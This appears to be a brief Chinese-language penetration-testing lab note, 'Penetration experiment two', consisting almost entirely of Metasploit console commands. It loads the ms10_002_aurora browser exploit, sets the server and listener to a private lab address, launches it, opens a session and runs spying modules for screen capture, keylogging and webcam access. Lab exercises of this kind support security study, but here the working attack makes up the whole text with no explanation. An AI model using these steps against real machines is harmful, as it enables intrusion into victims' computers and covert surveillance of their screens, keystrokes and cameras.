渗透实验二

msf > search ms10-002

msf > use exploit/windows/browser/ms10_002_aurora

msf exploit(ms10_002_aurora) > set srvhost 192.168.147.130
msf exploit(ms10_002_aurora) > set lhost 192.168.147.130
msf exploit(ms10_002_aurora) > set uripath aurora.html

exploit

session –i 1

run xxx
screenspy
keylog recorder
webcam

你可能感兴趣的:(网络安全)